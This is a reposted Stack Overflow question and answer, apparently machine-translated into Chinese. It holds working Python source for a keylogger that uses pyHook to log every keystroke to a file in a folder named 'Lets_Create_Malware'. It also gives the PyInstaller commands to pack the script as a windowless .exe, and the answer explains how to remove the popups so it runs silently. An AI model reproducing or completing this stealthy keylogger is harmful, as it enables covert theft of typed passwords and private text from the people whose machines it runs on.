gpt4 book ai didi

python - 使用 Pyinstaller 和 -noconsole 会弹出弹出窗口

转载 作者:行者123 更新时间:2023-11-30 22:53:24 26 4
gpt4 key购买 nike

我有 python 文件,用 .pyw 保存以抑制控制台

import pyHook, pythoncom, sys, logging

file_log = 'C:\\Lets_Create_Malware\\log.txt'

def OnKeyboardEvent (event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

然后我用 pyinstaller 转换为 .exe,

c:\Python27\Malware>pyinstaller --debug --onefile --noupx keylogger.pyw

但是当我双击 .exe 时,我得到控制台

enter image description here

我尝试了 --noconsole 选项,即

c:\Python27\Malware>pyinstaller --debug --onefile --noupx --noconsole keylogger.pyw

但是当我双击 .exe 时,我收到一系列烦人的弹出窗口,我必须使用任务管理器终止它们。

如何解决?

enter image description here

最佳答案

请创建一个 .spec 文件,然后将其添加到 EXE 部分

debug=False

PyInstaller 手册解释了规范文件 here 。然后使用spec文件而不是脚本文件调用pyinstaller。

关于python - 使用 Pyinstaller 和 -noconsole 会弹出弹出窗口,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/38213339/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com